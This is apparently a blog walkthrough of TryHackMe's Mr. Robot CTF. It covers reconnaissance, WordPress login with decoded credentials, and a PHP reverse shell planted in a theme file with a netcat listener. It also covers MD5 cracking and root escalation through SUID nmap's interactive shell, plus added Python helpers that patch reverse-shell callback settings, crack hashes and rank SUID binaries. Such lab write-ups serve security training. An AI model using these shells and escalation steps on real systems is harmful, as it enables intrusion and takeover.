Mr. Robot TryHackMe Walkthrough: Medium CTF Guide with WordPress Exploit & Root Privilege…
Summary: the article walks through reconnaissance and enumeration with nmap and Gobuster to find the three flags in the Mr. Robot CTF, including decoding a Base64 string to obtain credentials, uploading a reverse shell through WordPress to get a shell, and escalating to root via a SUID binary. 2025-8-31 11:33:20 Author: infosecwriteups.com

Prajwal

The Mr. Robot CTF on TryHackMe is a medium-level challenge inspired by the famous TV series. If solved, you’ll also earn a special badge from TryHackMe.

In this walkthrough, we’ll go step by step: reconnaissance, enumeration, exploitation, user access, and finally root escalation.

Initial Scan

As with any CTF, the first step is reconnaissance. I started by scanning the target with nmap:

nmap -sCV -vv <target-ip>

The output revealed that port 80 (HTTP) was open, which means there’s a web service running. That’s always a good place to start investigating. So, let’s move on to web enumeration.

Part 2: Web Enumeration & First Flag

After confirming that port 80 was open, I browsed to the web application. The landing page looked interesting but didn’t immediately reveal anything useful.

To dig deeper, I used Gobuster for directory brute-forcing:

gobuster dir -u http://<target-ip> -w /usr/share/wordlists/dirb/common.txt

Gobuster Results

The scan revealed several useful directories, including:

  • /robots.txt

1. First Flag

Visiting:

http://<target-ip>/key-1-of-3.txt

revealed the first flag ✅.

2. Wordlist Discovery

The /robots.txt file also pointed to /fsocity.dic. Accessing it revealed a large wordlist file — highly suspicious and likely intended for login brute-forcing later. Definitely something to keep in mind.

With the first flag secured and a potential wordlist for cracking, it was time to keep enumerating.

Part 3: Finding Credentials & Gaining WordPress Access

Continuing with web enumeration, another interesting directory found by Gobuster was /license. Visiting this path revealed an encoded string that stood out as a likely clue.

Decoding the License String

  • I copied the encoded text and used hashes.com to identify its type. It was detected as Base64. Strictly, Base64 is an encoding, not a hash: the restricted alphabet and trailing = padding give it away, and it reverses directly without any cracking. On a real engagement, keep strings like this off third-party sites, since they may be live credentials.
  • Decoding the Base64 string (online tools such as base64decode.org work, as does the base64 -d command-line tool) revealed what appeared to be login credentials.

These credentials pointed towards a WordPress user account, likely elliot (the main character of the show).
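As an added example (not code from the original post), the identification and decoding step above done offline in Python: check that a string has the Base64 alphabet and padding, decode it, and split the result into a username and password on the first colon only. The sample string is constructed here and is not the value served by the target's /license page.

```python
"""Identify and decode a Base64-encoded credential string offline.

Added example for this walkthrough; it is not code from the original post.
The sample below is constructed for illustration and is not the value served
by the target's /license page.
"""
import base64
import binascii
import re
from typing import Optional, Tuple

# Standard Base64 alphabet with optional '=' padding.
_B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def _pad(s: str) -> str:
    """Restore '=' padding that copy-paste often strips."""
    return s + "=" * (-len(s) % 4)


def looks_like_base64(blob: str) -> bool:
    """Syntactic check: right alphabet, sane padding, and it actually decodes."""
    s = blob.strip()
    if not s or not _B64_RE.match(s):
        return False
    try:
        base64.b64decode(_pad(s), validate=True)
    except binascii.Error:
        return False
    return True


def decode_base64_text(blob: str) -> Optional[str]:
    """Decode to text, or None when the bytes are not printable text."""
    s = blob.strip()
    if not looks_like_base64(s):
        return None
    raw = base64.b64decode(_pad(s), validate=True)
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    if not all(c.isprintable() or c in "\r\n\t" for c in text):
        return None
    return text


def split_credential(text: str) -> Optional[Tuple[str, str]]:
    """Split 'user:password' on the first colon only; passwords may contain ':'."""
    lines = text.strip().splitlines()
    if not lines or ":" not in lines[0]:
        return None
    user, password = lines[0].split(":", 1)
    return (user, password) if user else None


def decode_credential(blob: str) -> Optional[Tuple[str, str]]:
    """Full pipeline: Base64 blob -> (username, password) or None."""
    text = decode_base64_text(blob)
    return split_credential(text) if text is not None else None


# Constructed sample (NOT the real string from the box), encoded here so the
# round trip is exact; decode_credential must recover the original pair.
SAMPLE_PLAINTEXT = "alice:S3cret:with:colons"
SAMPLE = base64.b64encode(SAMPLE_PLAINTEXT.encode()).decode()

if __name__ == "__main__":
    print(SAMPLE, "->", decode_credential(SAMPLE))
```

Splitting on the first colon matters: a password containing a colon would otherwise be truncated, and the login attempt would fail for a reason that is hard to spot.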

Logging in to WordPress

With the decoded username and password, I accessed the WordPress login panel at:

http://<target-ip>/wp-login.php

After entering the credentials, I successfully logged in as user elliot. This granted access to the WordPress admin dashboard, which is perfect for moving forward with exploitation.

Part 4: Uploading a Reverse Shell & Getting a Shell

With access to the WordPress dashboard as user elliot, it was time to leverage that privilege for code execution.

Uploading a PHP Reverse Shell

  • I navigated to: Appearance → Editor.
  • Here, I was able to edit theme files directly. Because the theme editor writes PHP that the web server then executes, any administrator account is one file edit away from code execution unless DISALLOW_FILE_EDIT is set in wp-config.php.
  • I downloaded a standard PHP reverse shell from PentestMonkey.
  • Using the editor, I replaced the contents of 404.php in the active theme (Twenty Fifteen on this box) with the reverse shell code.
  • Before saving, I updated the reverse shell script with my TryHackMe VPN IP address and a port of my choice. The template ships pointing at 127.0.0.1, so an unedited copy never calls back.

Triggering the Shell

  • On my attacking machine, I started a listener with:
nc -lvnp <chosen-port>
  • Then, I requested the edited file. WordPress serves theme files from wp-content, not wp-includes, and theme directory names are lowercase, so the path is:
http://<target-ip>/wp-content/themes/twentyfifteen/404.php

which triggered the reverse shell and connected me to the target. Requesting the file directly runs it as a standalone PHP script, so no real 404 error is needed.

At this stage, I now had a shell on the target machine as the web server user.
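As an added example (not code from the original post or from PentestMonkey), the two edits that have to be right before saving the shell: set $ip and $port, refuse the classic mistakes (loopback address, bad port), confirm the edit took, and build the trigger URL from the WordPress theme layout. TEMPLATE is a constructed stand-in carrying only the two lines that matter from php-reverse-shell.php; the 10.8.1.2 / 4444 values in the demo are assumed.

```python
"""Patch a PentestMonkey-style PHP reverse shell with the attacker's LHOST/LPORT,
verify the edit took, and build the URL that fires it once it is saved over the
active theme's 404.php.

Added example for this walkthrough; it is not code from the original post or
from PentestMonkey. TEMPLATE is a constructed stand-in carrying only the two
lines that matter from php-reverse-shell.php; the rest of the shell is omitted.
"""
import ipaddress
import re
from urllib.parse import quote

# Constructed stand-in for the relevant lines of PentestMonkey's template.
TEMPLATE = """<?php
set_time_limit (0);
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
// ... remainder of the shell omitted in this stand-in ...
"""

_IP_RE = re.compile(r"^(\$ip\s*=\s*')([^']*)(';.*)$", re.M)
_PORT_RE = re.compile(r"^(\$port\s*=\s*)(\d+)(;.*)$", re.M)


def shell_settings(php: str):
    """Return the (ip, port) a shell is configured to call back to, or None."""
    m_ip, m_port = _IP_RE.search(php), _PORT_RE.search(php)
    if not m_ip or not m_port:
        return None
    return m_ip.group(2), int(m_port.group(2))


def patch_reverse_shell(template: str, lhost: str, lport: int) -> str:
    """Set $ip/$port, refusing the classic mistakes (loopback LHOST, bad port)."""
    addr = ipaddress.ip_address(lhost)          # ValueError on anything not an IP
    if addr.is_loopback:
        raise ValueError("LHOST is loopback; the target would connect to itself")
    if not 1 <= lport <= 65535:
        raise ValueError("LPORT out of range")
    patched, n_ip = _IP_RE.subn(lambda m: f"{m.group(1)}{lhost}{m.group(3)}", template)
    patched, n_port = _PORT_RE.subn(lambda m: f"{m.group(1)}{lport}{m.group(3)}", patched)
    if n_ip != 1 or n_port != 1:
        raise ValueError("expected exactly one $ip and one $port line in the template")
    if shell_settings(patched) != (lhost, lport):
        raise RuntimeError("patch did not take; do not upload this file")
    return patched


def trigger_url(target: str, theme: str = "twentyfifteen", file: str = "404.php") -> str:
    """WordPress keeps themes under /wp-content/themes/<theme>/, not wp-includes."""
    return f"http://{target}/wp-content/themes/{quote(theme)}/{quote(file)}"


if __name__ == "__main__":
    shell = patch_reverse_shell(TEMPLATE, "10.8.1.2", 4444)   # assumed VPN IP/port
    print(shell_settings(shell), trigger_url("10.10.10.10"))
```

Start the listener (nc -lvnp 4444 for the values above) before requesting the URL, with curl or a browser; the shell connects once and is lost if nothing is listening.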

Part 5: Post-Exploitation & Gaining User Access

With a shell on the target, the next steps focused on exploring the system and escalating to a real user account.

Exploring Home Directories

  • I stabilized the shell for easier navigation (this also matters later: su needs a real terminal).
  • Entered the users’ home directory:

cd /home
ls
  • Found entries for two users, including robot.

The Second Flag and a Password Hash

  • Navigated to:
cd robot
  • Located key-2-of-3.txt, but did not have read permission.
  • Discovered a file named password.raw-md5 and displayed its contents with cat.
  • As the filename suggests, the file contained a raw (unsalted) MD5 hash.

Cracking the Password Hash

  • Used an online lookup like CrackStation to crack the hash. Services like this do not decode anything; they match the hash against precomputed tables, which is why a raw MD5 of a common string falls instantly. Offline, john or hashcat against the /fsocity.dic wordlist found earlier would do the same job without sending the hash anywhere.
  • The result was:

username: robot
password: abcdefghijklmnopqrstuvwxyz

Switched user with:

su robot
  • and provided the newly cracked password. su refuses to run without a terminal, so if the shell was not stabilized earlier, this is where it shows.

This granted access as user robot, and now I could read the second flag in key-2-of-3.txt!
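As an added example (not code from the original post), the hash lookup done offline: normalize the digest, deduplicate the wordlist, and compare MD5 of each candidate. TARGET_HASH is RFC 1321's published test vector for "abcdefghijklmnopqrstuvwxyz" (the password the post recovers), and WORDLIST is a constructed list with the duplicates and stray whitespace that dumped lists usually carry; on the box, the natural input is /fsocity.dic.

```python
"""Crack a raw MD5 password hash offline against a wordlist.

Added example for this walkthrough; it is not code from the original post.
TARGET_HASH is RFC 1321's test vector for "abcdefghijklmnopqrstuvwxyz" and
WORDLIST is constructed; on the box the natural input is /fsocity.dic.
"""
import hashlib
import re
from typing import Iterable, List, Optional

# RFC 1321 test vector: MD5("abcdefghijklmnopqrstuvwxyz")
TARGET_HASH = "c3fcd3d76192e4007dfb496cca67e13b"

# Constructed wordlist with duplicates and stray whitespace, as dumped lists often have.
WORDLIST = """password
123456
elliot
abcdefghijklmnopqrstuvwxyz
elliot
ROBOT
abcdefghijklmnopqrstuvwxyz
""".splitlines()

_MD5_RE = re.compile(r"^[0-9a-f]{32}$")


def normalize_hash(h: str) -> str:
    """Accept upper/lower case and surrounding whitespace; reject anything that is not raw MD5."""
    h = h.strip().lower()
    if not _MD5_RE.match(h):
        raise ValueError("not a raw 32-hex-char MD5 digest")
    return h


def dedupe(words: Iterable[str]) -> List[str]:
    """Drop duplicates, blanks and surrounding whitespace, keeping first-seen order."""
    seen, out = set(), []
    for w in words:
        w = w.strip()
        if w and w not in seen:
            seen.add(w)
            out.append(w)
    return out


def crack_md5(target: str, words: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose MD5 equals target, else None."""
    target = normalize_hash(target)
    for w in dedupe(words):
        if hashlib.md5(w.encode()).hexdigest() == target:
            return w
    return None


def crack_md5_file(target: str, path: str) -> Optional[str]:
    """Same, streaming a wordlist file such as a downloaded fsocity.dic."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        return crack_md5(target, (line.rstrip("\n") for line in fh))


if __name__ == "__main__":
    print(crack_md5(TARGET_HASH, WORDLIST))
```

Deduplicating first is worth it on large dumped wordlists; the same effect on the shell is sort -u fsocity.dic. For anything beyond a CTF, hashcat -m 0 does this job orders of magnitude faster, and keeping the hash off online services avoids leaking a password you may be about to reuse on the engagement.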

Part 6: Privilege Escalation to Root & Grabbing the Root Flag

With access as user robot, the final step was to gain root privileges and capture the last flag.

Privilege Escalation (SUID Binary Abuse)

  • Checked for standard sudo privileges:
sudo -l

but found nothing useful.

Instead, searched for SUID binaries that could be abused:

find / -perm -4000 2>/dev/null

  • Discovered that nmap was present with the SUID bit set.

Exploiting SUID Nmap for Root

  • Referenced GTFOBins for nmap privilege escalation techniques.
  • Launched an interactive shell as root using:

nmap --interactive
!sh
  • The prompt changed, confirming root access. This works because the box ships an old nmap that still has interactive mode; modern releases removed --interactive, and for those GTFOBins lists an NSE-script variant instead.
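As an added example (not code from the original post), the SUID hunt above written out: walk the filesystem the way find / -perm -4000 does (setuid bit in st_mode, unreadable paths skipped, /proc and /sys pruned), then rank the hits so names with a GTFOBins entry come first and stock setuid binaries last. KNOWN_ABUSABLE is a short hand-picked subset of GTFOBins' SUID entries, not the full catalogue, and build_demo_tree() builds a constructed directory so the logic can be run without scanning a real system.

```python
"""Enumerate setuid/setgid binaries (what `find / -perm -4000 2>/dev/null` does)
and rank the ones worth a GTFOBins lookup.

Added example for this walkthrough; it is not code from the original post.
KNOWN_ABUSABLE is a short hand-picked subset of binaries GTFOBins documents as
SUID-abusable, not the full catalogue, and build_demo_tree() builds a constructed
directory so the logic can be exercised without scanning a real system.
"""
import os
import stat
import tempfile
from typing import Dict, List, Tuple

# Assumption: illustrative subset only; check gtfobins.github.io for the live list.
KNOWN_ABUSABLE = {"nmap", "find", "vim", "bash", "python", "perl", "env", "cp", "less", "awk"}
# Setuid binaries present on a stock Linux install; ranked last, not ignored.
EXPECTED = {"sudo", "su", "passwd", "mount", "umount", "ping", "chsh", "chfn", "newgrp", "gpasswd", "pkexec"}

Hit = Tuple[str, int, int]  # (path, owner uid, st_mode)


def is_setuid(mode: int) -> bool:
    return bool(mode & stat.S_ISUID)


def is_setgid(mode: int) -> bool:
    return bool(mode & stat.S_ISGID)


def find_suid(root: str = "/") -> List[Hit]:
    """Walk root and return regular files with the setuid or setgid bit set."""
    hits: List[Hit] = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        # Skip pseudo-filesystems: noisy, slow, and never real binaries.
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in ("/proc", "/sys", "/dev")]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)        # lstat: do not follow symlinks
            except OSError:
                continue                   # unreadable: same as 2>/dev/null
            if stat.S_ISREG(st.st_mode) and (is_setuid(st.st_mode) or is_setgid(st.st_mode)):
                hits.append((path, st.st_uid, st.st_mode))
    return hits


def triage(hits: List[Hit]) -> List[Tuple[str, str, int]]:
    """Rank hits: GTFOBins-known names first, unfamiliar names next, stock ones last.
    Only root-owned (uid 0) setuid files hand out a root shell; the uid is returned
    so that can be checked before trying anything."""
    ranked = []
    for path, uid, mode in hits:
        name = os.path.basename(path)
        if name in KNOWN_ABUSABLE:
            ranked.append((0, "gtfobins", path, uid))
        elif name in EXPECTED:
            ranked.append((2, "expected", path, uid))
        else:
            ranked.append((1, "review", path, uid))
    ranked.sort()
    return [(label, path, uid) for _, label, path, uid in ranked]


def build_demo_tree() -> Dict[str, str]:
    """Constructed fixture: a temp dir holding a setuid 'nmap', a setuid 'passwd'
    and a plain file, so find_suid/triage can be demonstrated offline."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    paths = {"root": root}
    for name, mode in (("nmap", 0o4755), ("passwd", 0o4755), ("plain", 0o755)):
        p = os.path.join(root, name)
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(p, mode)
        paths[name] = p
    return paths


if __name__ == "__main__":
    demo = build_demo_tree()
    for label, path, uid in triage(find_suid(demo["root"])):
        print(f"{label:9} uid={uid} {path}")
```

Run find_suid("/") on the target for the real list; the "review" bucket (setuid files whose name is on neither list) is often where custom or vendor binaries hide, and those deserve a look even without a GTFOBins page.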

Grabbing the Final Flag

  • Navigated to the root directory and retrieved the root flag:
cd /root
cat key-3-of-3.txt
  • With this, all three flags were obtained, completing the challenge and unlocking the Mr. Robot badge on TryHackMe.

Part 7: Conclusion & Key Takeaways

Successfully completing the Mr. Robot CTF box on TryHackMe provides a comprehensive journey through classic CTF techniques and real-world exploitation steps.

What This Challenge Covered

  • Reconnaissance and enumeration using tools like Nmap and Gobuster to reveal hidden directories and files.
  • Decoding and password cracking through base64 and MD5 hash reversal.
  • Exploiting WordPress, including theme file editing for remote code execution.
  • Privilege escalation using SUID binary abuse (nmap) to obtain root access.

Final Thoughts

This box is excellent for strengthening core penetration testing skills:

  • Directory brute-forcing
  • Hash cracking
  • Switching users with cracked credentials
  • Manual privilege escalation

It’s also a fun homage to the Mr. Robot series — and earning that unique TryHackMe badge is a satisfying bonus!


Source: https://infosecwriteups.com/mr-robot-tryhackme-walkthrough-medium-ctf-guide-with-wordpress-exploit-root-privilege-194fca7065d7?source=rss----7b722bfd1b8d---4